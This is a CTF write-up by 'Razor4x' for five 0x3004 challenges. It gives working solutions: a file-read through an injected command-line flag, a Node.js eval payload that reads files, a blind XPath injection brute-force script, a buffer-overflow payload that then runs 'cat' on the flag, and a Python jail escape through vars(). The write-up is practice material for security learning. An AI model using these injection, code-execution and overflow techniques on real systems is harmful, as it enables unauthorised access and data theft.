0x3004 CTF - Pwn2, EZ, Calc, PATH_TO_PRO, "DOTO, BEST DOTO", Pyjail 1 Writeup

EZ:

http://challenges.wargame.vn:50000/-h/index
output:  -f FILE, --file=FILE  READ FILE
http://challenges.wargame.vn:50000/-f=flag/index
0x3004{EzZzZzZzZzZzZ}

Calc:

we have a nice nodejs code exec here:

eval=

fs = require('fs');

fs.readFileSync("flag_is_here_you_wont_able_to_guess_this_file_name");

flag: 0x3004{n0jsn0fun}

PATH_TO_PRO:

XPath injection here. sadly i found out then there was a really shorter and easy way to get the flag instead of mine:

import requests
#/all/user/u/pass
#/all/user/u/name
#/all/user/u/data
#/all/f_ll_ag/data
#0x3004{XXXpath}
pwd=""
for j in range(1,16):
    for i in range(48,127):
        if chr(i)=='&':
            continue
        #query='http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/index.php?name=admin" or substring(name(/all/f_ll_ag/*[1]),'+str(j)+',1)="'+chr(i)+'&pass=guest'
        query='http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/index.php?name=admin" or substring(/all/f_ll_ag/data/text(),'+str(j)+',1)="'+chr(i)+'&pass=guest'
        r=requests.get(query)
        if 'Maybe' in r.text:
            print "OK "+chr(i)
            pwd+=chr(i)
            break
        else:
            print "Nope "+chr(i)
print pwd

DOTO, BEST DOTO:

easy programming challenge: http://pastebin.com/gvzb8Qxh

Pwn2:

data = s.recv(1024)
data = s.recv(1024)
payload = "\n"
s.send(payload)
payload = "A"*8 + "\xb2\x06\x40\x00"
s.send(payload+"\n")
data = s.recv(1024)
s.send("cat /home/pwn2/flag\n")
data = s.recv(1024)
print data
#0x3004{Dat_nuoc_Viet_Nam_La_Mot_Dan_Toc_Viet_Nam_La_Mot}

Pyjail 1:

this challenge was solved by nurfed. Basically, the script cleared modules, deleted dir(), eval, etc.. but we can still access local variables throught vars():

list(vars()[list(vars())[8]])

flag: 0x3004{ez_Bre34k}

Razor4x